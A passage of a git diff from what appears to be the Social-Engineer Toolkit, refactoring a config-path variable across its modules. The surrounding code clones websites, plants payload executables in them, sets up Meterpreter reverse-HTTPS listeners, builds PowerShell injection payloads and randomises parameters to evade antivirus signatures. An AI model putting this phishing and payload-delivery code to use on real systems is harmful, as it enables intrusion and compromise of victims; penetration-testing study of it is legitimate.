os.path.isfile(setdir + "/web_clone/index.html"): + if os.path.isfile(userconfigpath + "web_clone/index.html"): print_status( "Stager turned off, prepping direct download payload...") - fileopen = open(setdir + "/web_clone/index.html", "r") - filewrite = open(setdir + "/web_clone/index.html.3", "w") + fileopen = open(userconfigpath + "web_clone/index.html", "r") + filewrite = open(userconfigpath + "web_clone/index.html.3", "w") data = fileopen.read() # replace freehugs with ip and port data = data.replace("freehugs", reverse_connection) @@ -293,22 +293,22 @@ if stager == "off" or payload_selection == "SETSHELL_HTTP": # be newer if payload_selection == "SETSHELL": try: - if os.path.isfile(setdir + "/web_clone/index.html"): - os.remove(setdir + "/web_clone/index.html") - shutil.copyfile(setdir + "/web_clone/index.html.3", - setdir + "/web_clone/index.html") - if os.path.isfile(setdir + "/web_clone/index.html.3"): - os.remove(setdir + "/web_clone/index.html.3") - if os.path.isfile(setdir + "/web_clone/msf.exe"): - os.remove(setdir + "/web_clone/msf.exe") - shutil.copyfile(setdir + "/web_clone/x", - setdir + "/web_clone/msf.exe") + if os.path.isfile(userconfigpath + "web_clone/index.html"): + os.remove(userconfigpath + "web_clone/index.html") + shutil.copyfile(userconfigpath + "web_clone/index.html.3", + userconfigpath + "web_clone/index.html") + if os.path.isfile(userconfigpath + "web_clone/index.html.3"): + os.remove(userconfigpath + "web_clone/index.html.3") + if os.path.isfile(userconfigpath + "web_clone/msf.exe"): + os.remove(userconfigpath + "web_clone/msf.exe") + shutil.copyfile(userconfigpath + "web_clone/x", + userconfigpath + "web_clone/msf.exe") shutil.copyfile( - setdir + "/web_clone/msf.exe", setdir + "/msf.exe") - if os.path.isfile(setdir + "/msf.exe"): - os.remove(setdir + "/msf.exe") + userconfigpath + "web_clone/msf.exe", userconfigpath + "msf.exe") + if os.path.isfile(userconfigpath + "msf.exe"): + os.remove(userconfigpath + "msf.exe") shutil.copyfile( - setdir + "/web_clone/msf.exe", setdir + "/msf.exe") + userconfigpath + "web_clone/msf.exe", userconfigpath + "msf.exe") # catch errors, will convert to log later except Exception as error: @@ -317,22 +317,22 @@ if stager == "off" or payload_selection == "SETSHELL_HTTP": # if we are using the HTTP reverse shell then lets use this if payload_selection == "SETSHELL_HTTP": try: - if os.path.isfile(setdir + "/web_clone/index.html"): - os.remove(setdir + "/web_clone/index.html") - shutil.copyfile(setdir + "/web_clone/index.html.3", - setdir + "/web_clone/index.html") - if os.path.isfile(setdir + "/web_clone/index.html.3"): - os.remove(setdir + "/web_clone/index.html.3") - if os.path.isfile(setdir + "/web_clone/msf.exe"): - os.remove(setdir + "/web_clone/msf.exe") + if os.path.isfile(userconfigpath + "web_clone/index.html"): + os.remove(userconfigpath + "web_clone/index.html") + shutil.copyfile(userconfigpath + "web_clone/index.html.3", + userconfigpath + "web_clone/index.html") + if os.path.isfile(userconfigpath + "web_clone/index.html.3"): + os.remove(userconfigpath + "web_clone/index.html.3") + if os.path.isfile(userconfigpath + "web_clone/msf.exe"): + os.remove(userconfigpath + "web_clone/msf.exe") shutil.copyfile( - "src/payloads/set_payloads/http_shell.binary", setdir + "/web_clone/msf.exe") + "src/payloads/set_payloads/http_shell.binary", userconfigpath + "web_clone/msf.exe") shutil.copyfile( - setdir + "/web_clone/msf.exe", setdir + "/msf.exe") - if os.path.isfile(setdir + "/msf.exe"): - os.remove(setdir + "/msf.exe") + userconfigpath + "web_clone/msf.exe", userconfigpath + "msf.exe") + if os.path.isfile(userconfigpath + "msf.exe"): + os.remove(userconfigpath + "msf.exe") shutil.copyfile( - setdir + "/web_clone/msf.exe", setdir + "/msf.exe") + userconfigpath + "web_clone/msf.exe", userconfigpath + "msf.exe") # catch errors, will convert to log later except Exception as error: diff --git a/src/core/set.py b/src/core/set.py index e44658712..cac6ec745 100644 --- a/src/core/set.py +++ b/src/core/set.py @@ -205,7 +205,7 @@ try: try: # write our attack vector to file to be called later - filewrite = open(setdir + "/attack_vector", "w") + filewrite = open(userconfigpath + "attack_vector", "w") # webjacking and web templates are not allowed if attack_vector == "5" and choice3 == "1": @@ -329,7 +329,7 @@ try: ["2"], "IP address to SET web server (this could be your external IP or hostname)")) filewrite2 = open( - setdir + "/interface", "w") + userconfigpath + "interface", "w") filewrite2.write( ipquestion) filewrite2.close() @@ -407,8 +407,8 @@ try: sys.path.append(definepath + "/src/html/") # clean up stale file - if os.path.isfile(setdir + "/cloner.failed"): - os.remove(setdir + "/cloner.failed") + if os.path.isfile(userconfigpath + "cloner.failed"): + os.remove(userconfigpath + "cloner.failed") site_cloned = True @@ -429,7 +429,7 @@ try: except: import src.core.payloadgen.create_payloads - if os.path.isfile(setdir + "/cloner.failed"): + if os.path.isfile(userconfigpath + "cloner.failed"): site_cloned = False if site_cloned == True: @@ -506,9 +506,9 @@ try: definepath = os.getcwd() sys.path.append( definepath + "/src/webattack/web_clone/") - if os.path.isfile(setdir + "/site.template"): - os.remove(setdir + "/site.template") - filewrite = open(setdir + "/site.template", "w") + if os.path.isfile(userconfigpath + "site.template"): + os.remove(userconfigpath + "site.template") + filewrite = open(userconfigpath + "site.template", "w") filewrite.write("TEMPLATE=CUSTOM") print_info("SET supports both HTTP and HTTPS") # specify the site to clone @@ -574,7 +574,7 @@ try: except: import src.webattack.web_clone.cloner - if os.path.isfile(setdir + "/cloner.failed"): + if os.path.isfile(userconfigpath + "cloner.failed"): site_cloned = False if site_cloned == True: @@ -652,13 +652,13 @@ try: sys.path.append( definepath + "/src/webattack/web_clone/") - if os.path.isfile(setdir + "/site.template"): - os.remove(setdir + "/site.template") - filewrite = open(setdir + "/site.template", "w") + if os.path.isfile(userconfigpath + "site.template"): + os.remove(userconfigpath + "site.template") + filewrite = open(userconfigpath + "site.template", "w") filewrite.write("TEMPLATE=SELF") # specify the site to clone - if not os.path.isdir(setdir + "/web_clone"): - os.makedirs(setdir + "/web_clone") + if not os.path.isdir(userconfigpath + "web_clone"): + os.makedirs(userconfigpath + "web_clone") print_warning( "Example: /home/website/ (make sure you end with /)") print_warning( @@ -671,11 +671,11 @@ try: if not os.path.isfile(URL + "index.html"): if os.path.isfile(URL): shutil.copyfile( - "%s" % (URL), setdir + "/web_clone/index.html") + "%s" % (URL), userconfigpath + "web_clone/index.html") if not os.path.isfile(URL): if URL.endswith("index.html"): shutil.copyfile( - URL, "%s/web_clone/index.html" % (setdir)) + URL, "%s/web_clone/index.html" % (userconfigpath)) else: print_error("ERROR:index.html not found!!") print_error( @@ -690,11 +690,11 @@ try: choice = raw_input( "\n1. Copy just the index.html\n2. Copy the entire folder\n\nEnter choice [1/2]: ") if choice == "1" or choice == "": - if os.path.isfile("%s/web_clone/index.html" % (setdir)): + if os.path.isfile("%s/web_clone/index.html" % (userconfigpath)): os.remove( - "%s/web_clone/index.html" % (setdir)) + "%s/web_clone/index.html" % (userconfigpath)) shutil.copyfile( - URL + "index.html", "%s/web_clone/" % (setdir)) + URL + "index.html", "%s/web_clone/" % (userconfigpath)) if choice == "2": if os.path.isdir(URL + "src/webattack"): print_error( @@ -705,7 +705,7 @@ try: print_error( "You tried the same thing. Exiting now.") sys.exit() - copyfolder(URL, "%s/web_clone/" % setdir) + copyfolder(URL, "%s/web_clone/" % userconfigpath) filewrite.write("\nURL=%s" % (URL)) filewrite.close() @@ -782,7 +782,7 @@ try: if not match: if not match1: URL = ("http://" + URL) - filewrite = open(setdir + "/site.template", "w") + filewrite = open(userconfigpath + "site.template", "w") filewrite.write("\nURL=%s" % (URL)) filewrite.close() @@ -807,7 +807,7 @@ try: if not match: if not match1: URL = ("http://" + URL) - filewrite = open(setdir + "/site.template", "w") + filewrite = open(userconfigpath + "site.template", "w") filewrite.write("\nURL=%s" % (URL)) filewrite.close() # start tabnabbing here @@ -879,13 +879,13 @@ try: setprompt(["3"], "IP address for the reverse connection (payload)")) update_options("IPADDR=" + ipaddr) - filewrite1 = open(setdir + "/payloadgen", "w") + filewrite1 = open(userconfigpath + "payloadgen", "w") filewrite1.write("payloadgen=solo") filewrite1.close() # if choice is file-format if infectious_menu_choice == "1": - filewrite = open(setdir + "/fileformat.file", "w") + filewrite = open(userconfigpath + "fileformat.file", "w") filewrite.write("fileformat=on") filewrite.close() sys.path.append(definepath + "/src/core/msf_attacks/") @@ -923,8 +923,8 @@ try: # try: import src.core.payloadgen.solo # except: module_reload(src.core.payloadgen.solo) # if the set payload is there - if os.path.isfile(setdir + "/msf.exe"): - shutil.copyfile(setdir + "/msf.exe", "payload.exe") + if os.path.isfile(userconfigpath + "msf.exe"): + shutil.copyfile(userconfigpath + "msf.exe", "payload.exe") return_continue() # Main Menu choice 5: Mass Mailer Attack @@ -953,7 +953,7 @@ try: if teensy_menu_choice != "99": # set our teensy info file in program junk - filewrite = open(setdir + "/teensy", "w") + filewrite = open(userconfigpath + "teensy", "w") filewrite.write(teensy_menu_choice + "\n") if teensy_menu_choice != "3" and teensy_menu_choice != "7" and teensy_menu_choice != "8" and teensy_menu_choice != "9" and teensy_menu_choice != "10" and teensy_menu_choice != "11" and teensy_menu_choice != "12" and teensy_menu_choice != "13" and teensy_menu_choice != "14": yes_or_no = yesno_prompt( @@ -972,10 +972,10 @@ try: if yes_or_no == "NO": filewrite.close() # need these default files for web server load - filewrite = open(setdir + "/site.template", "w") + filewrite = open(userconfigpath + "site.template", "w") filewrite.write("TEMPLATE=CUSTOM") filewrite.close() - filewrite = open(setdir + "/attack_vector", "w") + filewrite = open(userconfigpath + "attack_vector", "w") filewrite.write("hid") filewrite.close() # if we are doing binary2teensy @@ -998,10 +998,10 @@ try: if teensy_menu_choice == "9": print_status( "Generating the SD2Teensy OSX ino file for you...") - if not os.path.isdir(setdir + "/reports/osx_sd2teensy"): - os.makedirs(setdir + "/reports/osx_sd2teensy") + if not os.path.isdir(userconfigpath + "reports/osx_sd2teensy"): + os.makedirs(userconfigpath + "reports/osx_sd2teensy") shutil.copyfile("src/teensy/osx_sd2teensy.ino", - "%s/reports/osx_sd2teensy/osx_sd2teensy.ino" % (setdir)) + "%s/reports/osx_sd2teensy/osx_sd2teensy.ino" % (userconfigpath)) print_status( "File has been exported to ~/.set/reports/osx_sd2teensy/osx_sd2teensy.ino") return_continue() @@ -1010,12 +1010,12 @@ try: if teensy_menu_choice == "10": print_status( "Generating the Arduino sniffer and libraries ino..") - if not os.path.isdir(setdir + "/reports/arduino_sniffer"): - os.makedirs(setdir + "/reports/arduino_sniffer") + if not os.path.isdir(userconfigpath + "reports/arduino_sniffer"): + os.makedirs(userconfigpath + "reports/arduino_sniffer") shutil.copyfile("src/teensy/x10/x10_sniffer.ino", - setdir + "/reports/arduino_sniffer/x10_sniffer.ino") + userconfigpath + "reports/arduino_sniffer/x10_sniffer.ino") shutil.copyfile("src/teensy/x10/libraries.zip", - setdir + "/reports/arduino_sniffer/libraries.zip") + userconfigpath + "reports/arduino_sniffer/libraries.zip") print_status( "Arduino sniffer files and libraries exported to ~/.set/reports/arduino_sniffer") return_continue() @@ -1024,12 +1024,12 @@ try: if teensy_menu_choice == "11": print_status( "Generating the Arduino jammer ino and libraries...") - if not os.path.isdir(setdir + "/reports/arduino_jammer"): - os.makedirs(setdir + "/reports/arduino_jammer") + if not os.path.isdir(userconfigpath + "reports/arduino_jammer"): + os.makedirs(userconfigpath + "reports/arduino_jammer") shutil.copyfile("src/teensy/x10/x10_blackout.ino", - setdir + "/reports/arduino_jammer/x10_blackout.ino") + userconfigpath + "reports/arduino_jammer/x10_blackout.ino") shutil.copyfile("src/teensy/x10/libraries.zip", - setdir + "/reports/arduino_jammer/libraries.zip") + userconfigpath + "reports/arduino_jammer/libraries.zip") print_status( "Arduino jammer files and libraries exported to ~/.set/reports/arduino_jammer") return_continue() @@ -1164,8 +1164,8 @@ and send the QRCode via a mailer. "Enter the URL you want the QRCode to go to (99 to exit): ") if url != "99": # if the reports directory does not exist then create it - if not os.path.isdir("%s/reports" % (setdir)): - os.makedirs("%s/reports" % (setdir)) + if not os.path.isdir("%s/reports" % (userconfigpath)): + os.makedirs("%s/reports" % (userconfigpath)) gen_qrcode(url) return_continue() diff --git a/src/core/setcore.py b/src/core/setcore.py index c54a976d2..bac58331d 100644 --- a/src/core/setcore.py +++ b/src/core/setcore.py @@ -2025,7 +2025,7 @@ def input(string): def fetch_template(): - fileopen = open(setdir + "/site.template").readlines() + fileopen = open(userconfigpath + "site.template").readlines() for line in fileopen: line = line.rstrip() match = re.search("URL=", line) diff --git a/src/core/ssl/setssl.py b/src/core/ssl/setssl.py index fdae850de..1fb5c18bb 100644 --- a/src/core/ssl/setssl.py +++ b/src/core/ssl/setssl.py @@ -8,7 +8,7 @@ from src.core.setcore import * import subprocess import os definepath = os.getcwd() -os.chdir(setdir) +os.chdir(userconfigpath) # create the directories for us subprocess.Popen("mkdir CA;cd CA;mkdir newcerts private", shell=True).wait() # move into CA directory diff --git a/src/fasttrack/mssql.py b/src/fasttrack/mssql.py index a046fe693..476c68945 100644 --- a/src/fasttrack/mssql.py +++ b/src/fasttrack/mssql.py @@ -240,7 +240,7 @@ def deploy_hex2binary(ipaddr, port, username, password): core.update_options("POWERSHELL_SOLO=ON") core.print_status("Prepping the payload for delivery and injecting alphanumeric shellcode...") - #with open(os.path.join(core.userconfigpath, "/payload_options.shellcode"), "w") as filewrite: + #with open(os.path.join(core.userconfigpath, "payload_options.shellcode"), "w") as filewrite: # format needed for shellcode generation filewrite = file(core.userconfigpath + "payload_options.shellcode", "w") filewrite.write("windows/meterpreter/reverse_https {0},".format(port)) diff --git a/src/fasttrack/psexec.py b/src/fasttrack/psexec.py index d0049c3d4..616e7df17 100644 --- a/src/fasttrack/psexec.py +++ b/src/fasttrack/psexec.py @@ -68,7 +68,7 @@ try: if port == "": port = "443" core.update_options("PORT={0}".format(port)) - with open(os.path.join(core.userconfigpath, "/payload_options.shellcode"), "w") as filewrite: + with open(os.path.join(core.userconfigpath, "payload_options.shellcode"), "w") as filewrite: # format needed for shellcode generation filewrite.write("{0} {1},".format(payload, port)) core.update_options("POWERSHELL_SOLO=ON") diff --git a/src/html/spawn.py b/src/html/spawn.py index 747c9c77d..8a64aff66 100644 --- a/src/html/spawn.py +++ b/src/html/spawn.py @@ -29,8 +29,8 @@ if check_options("CUSTOM_EXE="): custom = 1 if not "CMD/MULTI" in check_options("CUSTOM_EXE="): # here we need to modify the java applet to recognize custom attribute - fileopen3 = fileopen = open("%s/web_clone/index.html" % (setdir), "r") - filewrite = open("%s/web_clone/index.html.new" % (setdir), "w") + fileopen3 = fileopen = open("%s/web_clone/index.html" % (userconfigpath), "r") + filewrite = open("%s/web_clone/index.html.new" % (userconfigpath), "w") data = fileopen3.read() # we randomize param name so static sigs cant be used @@ -39,7 +39,7 @@ if check_options("CUSTOM_EXE="): 'param name="8" value="%s"' % (goat_random)) filewrite.write(data) filewrite.close() - subprocess.Popen("mv %s/web_clone/index.html.new %s/web_clone/index.html" % (setdir, setdir), shell=True).wait() + subprocess.Popen("mv %s/web_clone/index.html.new %s/web_clone/index.html" % (userconfigpath, userconfigpath), shell=True).wait() print_status("Note that since you are using a custom payload, you will need to create your OWN listener.") print_status("SET has no idea what type of payload you are using, so you will need to set this up manually.") @@ -68,8 +68,8 @@ msf_path = "" # see if we are using setshell set_payload = "" -if os.path.isfile(setdir + "/set.payload"): - fileopen = open(setdir + "/set.payload", "r") +if os.path.isfile(userconfigpath + "set.payload"): + fileopen = open(userconfigpath + "set.payload", "r") for line in fileopen: set_payload = line.rstrip() @@ -97,8 +97,8 @@ def web_server_start(): web_port = check_config("WEB_PORT=") # see if exploit requires webdav - if os.path.isfile(setdir + "/meta_config"): - fileopen = open(setdir + "/meta_config", "r") + if os.path.isfile(userconfigpath + "meta_config"): + fileopen = open(userconfigpath + "meta_config", "r") for line in fileopen: line = line.rstrip() match = re.search("set SRVPORT 80", line) @@ -114,8 +114,8 @@ def web_server_start(): ipaddr = input("Enter your ipaddress: ") # Grab custom or set defined - if os.path.isfile(setdir + "/site.template"): - fileopen = open(setdir + "/site.template", "r").readlines() + if os.path.isfile(userconfigpath + "site.template"): + fileopen = open(userconfigpath + "site.template", "r").readlines() for line in fileopen: line = line.rstrip() match = re.search("TEMPLATE=", line) @@ -124,13 +124,13 @@ def web_server_start(): template = line[1] # grab web attack selection - if os.path.isfile(setdir + "/attack_vector"): - fileopen = open(setdir + "/attack_vector", "r").readlines() + if os.path.isfile(userconfigpath + "attack_vector"): + fileopen = open(userconfigpath + "attack_vector", "r").readlines() for line in fileopen: attack_vector = line.rstrip() # if it doesn't exist just set a default template - if not os.path.isfile(setdir + "/attack_vector"): + if not os.path.isfile(userconfigpath + "attack_vector"): attack_vector = "nada" # Sticking it to A/V below @@ -145,14 +145,14 @@ def web_server_start(): # check multiattack flags here multiattack_harv = "off" - if os.path.isfile(setdir + "/multi_harvester"): + if os.path.isfile(userconfigpath + "multi_harvester"): multiattack_harv = "on" - if os.path.isfile(setdir + "/multi_tabnabbing"): + if os.path.isfile(userconfigpath + "multi_tabnabbing"): multiattack_harv = "on" # open our config file that was specified in SET - if os.path.isfile(setdir + "/site.template"): - fileopen = open(setdir + "/site.template", "r").readlines() + if os.path.isfile(userconfigpath + "site.template"): + fileopen = open(userconfigpath + "site.template", "r").readlines() # start loop here for line in fileopen: line = line.rstrip() @@ -164,7 +164,7 @@ def web_server_start(): url = line[1].rstrip() # if we didn't create template then do self - if not os.path.isfile(setdir + "/site.template"): + if not os.path.isfile(userconfigpath + "site.template"): template = "SELF" # If SET is setting up the website for you, get the website ready for @@ -224,38 +224,38 @@ def web_server_start(): if attack_vector != 'hijacking': print(bcolors.YELLOW + "[*] Moving payload into cloned website." + bcolors.ENDC) # copy all the files needed - if not os.path.isfile(setdir + "/" + applet_name): + if not os.path.isfile(userconfigpath + "" + applet_name): shutil.copyfile("%s/src/html/Signed_Update.jar.orig" % - (definepath), "%s/%s" % (setdir, applet_name)) - shutil.copyfile(setdir + "/%s" % (applet_name), - "%s/web_clone/%s" % (setdir, applet_name)) + (definepath), "%s/%s" % (userconfigpath, applet_name)) + shutil.copyfile(userconfigpath + "%s" % (applet_name), + "%s/web_clone/%s" % (userconfigpath, applet_name)) if os.path.isfile("%s/src/html/nix.bin" % (definepath)): nix = check_options("NIX.BIN=") shutil.copyfile("%s/src/html/nix.bin" % - (definepath), "%s/web_clone/%s" % (setdir, nix)) + (definepath), "%s/web_clone/%s" % (userconfigpath, nix)) if os.path.isfile("%s/src/html/mac.bin" % (definepath)): mac = check_options("MAC.BIN=") shutil.copyfile("%s/src/html/mac.bin" % (definepath), - "%s/web_clone/%s" % (setdir, definepath, mac)) - if os.path.isfile(setdir + "/msf.exe"): + "%s/web_clone/%s" % (userconfigpath, definepath, mac)) + if os.path.isfile(userconfigpath + "msf.exe"): win = check_options("MSF.EXE=") - shutil.copyfile(setdir + "/msf.exe", - "%s/web_clone/%s" % (setdir, win)) + shutil.copyfile(userconfigpath + "msf.exe", + "%s/web_clone/%s" % (userconfigpath, win)) # pull random name generation print_status( "The site has been moved. SET Web Server is now listening..") rand_gen = check_options("MSF_EXE=") if rand_gen != 0: - if os.path.isfile(setdir + "/custom.exe"): - shutil.copyfile(setdir + "/msf.exe", - setdir + "/web_clone/msf.exe") + if os.path.isfile(userconfigpath + "custom.exe"): + shutil.copyfile(userconfigpath + "msf.exe", + userconfigpath + "web_clone/msf.exe") print("\n[*] Website has been cloned and custom payload imported. Have someone browse your site now") - shutil.copyfile(setdir + "/web_clone/msf.exe", - setdir + "/web_clone/%s" % (rand_gen)) + shutil.copyfile(userconfigpath + "web_clone/msf.exe", + userconfigpath + "web_clone/%s" % (rand_gen)) # if docbase exploit do some funky stuff to get it to work right - if os.path.isfile(setdir + "/docbase.file"): + if os.path.isfile(userconfigpath + "docbase.file"): docbase = (r""" @@ -267,11 +267,11 @@ def web_server_start(): """ % (ipaddr)) - if os.path.isfile(setdir + "/web_clone/site.html"): - os.remove(setdir + "/web_clone/site.html") - shutil.copyfile(setdir + "/web_clone/index.html", - setdir + "/web_clone/site.html") - filewrite = open(setdir + "/web_clone/index.html", "w") + if os.path.isfile(userconfigpath + "web_clone/site.html"): + os.remove(userconfigpath + "web_clone/site.html") + shutil.copyfile(userconfigpath + "web_clone/index.html", + userconfigpath + "web_clone/site.html") + filewrite = open(userconfigpath + "web_clone/index.html", "w") filewrite.write(docbase) filewrite.close() @@ -288,7 +288,7 @@ def web_server_start(): import src.core.webserver as webserver # specify the path for the SET web directories for the applet # attack - path = (setdir + "/web_clone/") + path = (userconfigpath + "web_clone/") try: import multiprocessing p = multiprocessing.Process( @@ -320,7 +320,7 @@ def web_server_start(): import src.core.webserver as webserver # specify the path for the SET web directories for the # applet attack - path = (setdir + "/web_clone/") + path = (userconfigpath + "web_clone/") p = multiprocessing.Process( target=webserver.start_server, args=(web_port, path)) p.start() @@ -350,7 +350,7 @@ def web_server_start(): if apache == 1: subprocess.Popen("cp %s/src/html/*.bin %s 1> /dev/null 2> /dev/null;cp %s/src/html/*.html %s 1> /dev/null 2> /dev/null;cp %s/web_clone/* %s 1> /dev/null 2> /dev/null;cp %s/msf.exe %s 1> /dev/null 2> /dev/null;cp %s/*.jar %s 1> /dev/null 2> /dev/null" % - (definepath, apache_path, definepath, apache_path, setdir, apache_path, setdir, apache_path, setdir, apache_path), shell=True).wait() + (definepath, apache_path, definepath, apache_path, userconfigpath, apache_path, userconfigpath, apache_path, userconfigpath, apache_path), shell=True).wait() # if we are tracking users if track_email == "on": now = datetime.datetime.today() @@ -395,15 +395,15 @@ web_server = check_config("WEB_PORT=") # setup multi attack options here multiattack = "off" -if os.path.isfile(setdir + "/multi_tabnabbing"): +if os.path.isfile(userconfigpath + "multi_tabnabbing"): multiattack = "on" -if os.path.isfile(setdir + "/multi_harvester"): +if os.path.isfile(userconfigpath + "multi_harvester"): multiattack = "on" # Grab custom or set defined template = "" -if os.path.isfile(setdir + "/site.template"): - fileopen = open(setdir + "/site.template", "r").readlines() +if os.path.isfile(userconfigpath + "site.template"): + fileopen = open(userconfigpath + "site.template", "r").readlines() for line in fileopen: line = line.rstrip() match = re.search("TEMPLATE=", line) @@ -532,8 +532,8 @@ try: print(( bcolors.GREEN + "[--] Apache web server is currently in use for performance. [--]" + bcolors.ENDC)) - if os.path.isfile(setdir + "/meta_config"): - fileopen = open(setdir + "/meta_config", "r") + if os.path.isfile(userconfigpath + "meta_config"): + fileopen = open(userconfigpath + "meta_config", "r") for line in fileopen: line = line.rstrip() match = re.search("set SRVPORT 80", line) @@ -550,8 +550,8 @@ try: web_server_start() # if we are using ettercap - if os.path.isfile(setdir + "/ettercap"): - fileopen5 = open(setdir + "/ettercap", "r") + if os.path.isfile(userconfigpath + "ettercap"): + fileopen5 = open(userconfigpath + "ettercap", "r") for line in fileopen5: ettercap = line.rstrip() # run in background @@ -561,7 +561,7 @@ try: stderr=subprocess.PIPE, stdout=subprocess.PIPE) # if metasploit config is in directory - if os.path.isfile(setdir + "/meta_config"): + if os.path.isfile(userconfigpath + "meta_config"): print_info("Launching MSF Listener...") print_info("This may take a few to load MSF...") # this checks to see if we want to start a listener @@ -573,12 +573,12 @@ try: import pexpect # specify if we are using the multi pyinjector meta_config = "meta_config" - if os.path.isfile(setdir + "/meta_config_multipyinjector"): + if os.path.isfile(userconfigpath + "meta_config_multipyinjector"): meta_config = "meta_config_multipyinjector" # if we arent using a custom payload if custom != 1: child1 = pexpect.spawn( - "%smsfconsole -r %s/%s\r\n\r\n" % (msf_path, setdir, meta_config)) + "%smsfconsole -r %s/%s\r\n\r\n" % (msf_path, userconfigpath, meta_config)) # check if we want to deliver emails or track users that click the # link webattack_email = check_config("WEBATTACK_EMAIL=").lower() @@ -592,11 +592,11 @@ try: if custom != 1: child1.interact() - if os.path.isfile(setdir + "/set.payload"): + if os.path.isfile(userconfigpath + "set.payload"): port = check_options("PORT=") # grab configuration - fileopen = open(setdir + "/set.payload", "r") + fileopen = open(userconfigpath + "set.payload", "r") for line in fileopen: set_payload = line.rstrip() @@ -627,12 +627,12 @@ try: # if not then run it in windows if operating_system == "windows": - if not os.path.isfile(setdir + "/ratteserver.exe"): + if not os.path.isfile(userconfigpath + "ratteserver.exe"): shutil.copyfile( - "../../payloads/ratte/ratteserver.binary", setdir + "/ratteserver.exe") + "../../payloads/ratte/ratteserver.binary", userconfigpath + "ratteserver.exe") shutil.copyfile( - "../../payloads/ratte/cygwin1.dll", setdir + "/cygwin1.dll") - os.system(setdir + "/ratteserver %s" % (definepath, port)) + "../../payloads/ratte/cygwin1.dll", userconfigpath + "cygwin1.dll") + os.system(userconfigpath + "ratteserver %s" % (definepath, port)) # handle errors except Exception as e: diff --git a/src/payloads/powershell/prep.py b/src/payloads/powershell/prep.py index 4ee945471..71cb0e081 100644 --- a/src/payloads/powershell/prep.py +++ b/src/payloads/powershell/prep.py @@ -26,7 +26,7 @@ auto_migrate = check_config("AUTO_MIGRATE=") pyinjection = check_options("PYINJECTION=") if pyinjection == "ON": # check to ensure that the payload options were specified right - if os.path.isfile(setdir + "/payload_options.shellcode"): + if os.path.isfile(userconfigpath + "payload_options.shellcode"): pyinjection = "on" print_status( "Multi/Pyinjection was specified. Overriding config options.") @@ -56,7 +56,7 @@ if validate_ip(ipaddr) == False: # prompt what port to listen on for powershell then make an append to the current # metasploit answer file -if os.path.isfile("%s/meta_config_multipyinjector" % (setdir)): +if os.path.isfile("%s/meta_config_multipyinjector" % (userconfigpath)): # if we have multi injection on, don't worry about these if multi_injection != "on": if pyinjection == "off": @@ -66,12 +66,12 @@ if os.path.isfile("%s/meta_config_multipyinjector" % (setdir)): ["4"], "Enter the port for Metasploit to listen on for powershell [443]")) if port == "": port = "443" - fileopen = open("%s/meta_config_multipyinjector" % (setdir), "r") + fileopen = open("%s/meta_config_multipyinjector" % (userconfigpath), "r") data = fileopen.read() match = re.search(port, data) if not match: filewrite = open( - "%s/meta_config_multipyinjector" % (setdir), "a") + "%s/meta_config_multipyinjector" % (userconfigpath), "a") filewrite.write("\nuse exploit/multi/handler\n") if auto_migrate == "ON": filewrite.write( @@ -84,7 +84,7 @@ if os.path.isfile("%s/meta_config_multipyinjector" % (setdir)): if multi_injection != "on": if pyinjection == "off": # check to see if the meta config multi pyinjector is there - if not os.path.isfile("%s/meta_config_multipyinjector" % (setdir)): + if not os.path.isfile("%s/meta_config_multipyinjector" % (userconfigpath)): if check_options("PORT=") != 0: port = check_options("PORT=") # if port.options isnt there then prompt @@ -128,12 +128,12 @@ if multi_injection == "on": generate_powershell_alphanumeric_payload( powershell_inject_x86, ipaddr, ports, x86) - if os.path.isfile("%s/meta_config_multipyinjector" % (setdir)): + if os.path.isfile("%s/meta_config_multipyinjector" % (userconfigpath)): port_check = check_ports( - "%s/meta_config_multipyinjector" % (setdir), ports) + "%s/meta_config_multipyinjector" % (userconfigpath), ports) if port_check == False: filewrite = open( - "%s/meta_config_multipyinjector" % (setdir), "a") + "%s/meta_config_multipyinjector" % (userconfigpath), "a") filewrite.write("\nuse exploit/multi/handler\n") if auto_migrate == "ON": filewrite.write( @@ -143,15 +143,15 @@ if multi_injection == "on": filewrite.close() # if we aren't using multi pyinjector - if not os.path.isfile("%s/meta_config_multipyinjector" % (setdir)): + if not os.path.isfile("%s/meta_config_multipyinjector" % (userconfigpath)): # if meta config isn't created yet then create it - if not os.path.isfile("%s/meta_config" % (setdir)): - filewrite = open("%s/meta_config" % (setdir), "w") + if not os.path.isfile("%s/meta_config" % (userconfigpath)): + filewrite = open("%s/meta_config" % (userconfigpath), "w") filewrite.write("") filewrite.close() - port_check = check_ports("%s/meta_config" % (setdir), ports) + port_check = check_ports("%s/meta_config" % (userconfigpath), ports) if port_check == False: - filewrite = open("%s/meta_config" % (setdir), "a") + filewrite = open("%s/meta_config" % (userconfigpath), "a") filewrite.write("\nuse exploit/multi/handler\n") if auto_migrate == "ON": filewrite.write( @@ -164,7 +164,7 @@ if multi_injection == "on": if pyinjection == "on": multi_injection_x86 = "" # read in the file we need for parsing - fileopen = open(setdir + "/payload_options.shellcode", "r") + fileopen = open(userconfigpath + "payload_options.shellcode", "r") payloads = fileopen.read()[:-1].rstrip() # strips an extra , payloads = payloads.split(",") # format: payloadport @@ -196,7 +196,7 @@ if verbose.lower() == "on": time.sleep(3) print(x86) -filewrite = open("%s/x86.powershell" % (setdir), "w") +filewrite = open("%s/x86.powershell" % (userconfigpath), "w") filewrite.write(x86) filewrite.close() print_status("Finished generating powershell injection bypass.") diff --git a/src/payloads/set_payloads/listener.py b/src/payloads/set_payloads/listener.py index 61df3f573..19f0f5c96 100755 --- a/src/payloads/set_payloads/listener.py +++ b/src/payloads/set_payloads/listener.py @@ -17,10 +17,10 @@ definepath = os.getcwd() sys.path.append(definepath) # cleanup -if os.path.isfile(setdir + "/uac.address"): - os.remove(setdir + "/uac.address") -if os.path.isfile(setdir + "/system.address"): - os.remove(setdir + "/system.address") +if os.path.isfile(userconfigpath + "uac.address"): + os.remove(userconfigpath + "uac.address") +if os.path.isfile(userconfigpath + "system.address"): + os.remove(userconfigpath + "system.address") # will remove this later core_modules = True @@ -863,9 +863,9 @@ Example: shellcode - Then paste your shellcode \x41\x41\etc time.sleep(0.5) # write out system - if os.path.isfile("%s/system.address" % (setdir)): - os.remove("%s/system.address" % (setdir)) - filewrite = open("%s/system.address" % (setdir), "w") + if os.path.isfile("%s/system.address" % (userconfigpath)): + os.remove("%s/system.address" % (userconfigpath)) + filewrite = open("%s/system.address" % (userconfigpath), "w") filewrite.write(addr) filewrite.close() @@ -882,9 +882,9 @@ Example: shellcode - Then paste your shellcode \x41\x41\etc # had to do some funky stuff here because global vars are not working properly # inside threads, so the information cant be passed to # normal outside routines - if os.path.isfile(setdir + "/uac.address"): - os.remove(setdir + "/uac.address") - filewrite = open(setdir + "/uac.address", "w") 